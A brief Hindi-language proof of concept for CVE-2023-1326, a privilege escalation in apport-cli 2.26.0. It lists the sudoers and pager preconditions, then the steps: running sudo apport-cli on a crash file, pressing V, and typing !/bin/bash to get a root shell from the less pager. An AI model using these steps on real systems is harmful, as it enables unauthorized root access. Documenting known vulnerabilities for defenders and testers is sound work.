
apport-cli 2.26.0 में CVE-2023–1326 के लिए अवधारणा का प्रमाण
CVE-2023–1326 के लिए apport-cli 2.26.0 में एक proof of concept
यह भेद्यता apport-cli 2.26.0 में विशेषाधिकार वृद्धि है, जो CVE-2023–26604 के समान है; यह भेद्यता केवल तभी काम करती है यदि sudoers में निर्दिष्ट हो:

apport-cli 2.26.0 और उससे पहले के संस्करणों में एक विशेषाधिकार वृद्धि हमला पाया गया, जो CVE-2023-26604 के समान है। यदि किसी सिस्टम को विशेष रूप से इस तरह कॉन्फ़िगर किया गया है कि अविशेषाधिकार प्राप्त उपयोगकर्ता sudo apport-cli चला सकें, less को पेजर के रूप में कॉन्फ़िगर किया गया है, और टर्मिनल आकार सेट किया जा सकता है: एक स्थानीय हमलावर विशेषाधिकार बढ़ा सकता है।
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
